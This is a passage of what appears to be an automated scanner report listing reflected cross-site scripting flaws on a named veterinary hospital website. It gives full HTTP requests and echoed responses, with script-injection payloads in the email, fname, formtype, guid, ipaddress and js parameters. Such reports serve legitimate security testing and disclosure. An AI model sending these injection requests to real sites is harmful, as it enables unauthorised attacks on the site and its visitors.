d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=odcmj1resusthd8a2o5c117463; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="city" id="city" type="text" size="40" class="req" maxlength="255" value="75bbf"><script>alert(1)</script>a5aae805f3c" />
...[SNIP]...

2.11. http://www.vcahospitals.com/hanson/offer.html [email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/offer.html

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a242"><script>alert(1)</script>c14d1d110d8 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=8a242"><script>alert(1)</script>c14d1d110d8&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=p2odhpks37cmhn3tkfcpdu3fp4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="email" id="email" type="text" size="40" maxlength="255" value="8a242"><script>alert(1)</script>c14d1d110d8" />
...[SNIP]...

2.12. http://www.vcahospitals.com/hanson/offer.html [fname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/offer.html

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f51a8"><script>alert(1)</script>4d0141775d0 was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=f51a8"><script>alert(1)</script>4d0141775d0&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:16 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4b778k6m2ab1pu0m5ssdhgvgn4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="fname" id="fname" type="text" size="30" class="req" maxlength="50" value="f51a8"><script>alert(1)</script>4d0141775d0" />
...[SNIP]...

2.13. http://www.vcahospitals.com/hanson/offer.html [formtype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/offer.html

Issue detail

The value of the formtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d61d6"><script>alert(1)</script>e3343c73882 was submitted in the formtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITALd61d6"><script>alert(1)</script>e3343c73882&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=jvjkp2a3ouqtrsla9j7rqfi8m5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITALd61d6"><script>alert(1)</script>e3343c73882&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3fa
...[SNIP]...

2.14. http://www.vcahospitals.com/hanson/offer.html [guid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/offer.html

Issue detail

The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c92"><script>alert(1)</script>166b7134f96 was submitted in the guid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EBe1c92"><script>alert(1)</script>166b7134f96&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:23 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=q7se0pt37ht32v8m7658nv8sm4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EBe1c92"><script>alert(1)</script>166b7134f96&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email
...[SNIP]...

2.15. http://www.vcahospitals.com/hanson/offer.html [ipaddress parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/offer.html

Issue detail

The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5076b"><script>alert(1)</script>0fd887dd63 was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.2435076b"><script>alert(1)</script>0fd887dd63&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:27 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=2b7fn6e43qheokrevppr4nsb17; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
n" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.2435076b"><script>alert(1)</script>0fd887dd63&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%
...[SNIP]...

2.16. http://www.vcahospitals.com/hanson/offer.html [js parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/offer.html

Issue detail

The value of the js request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b73"><script>alert(1)</script>c6690637939 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

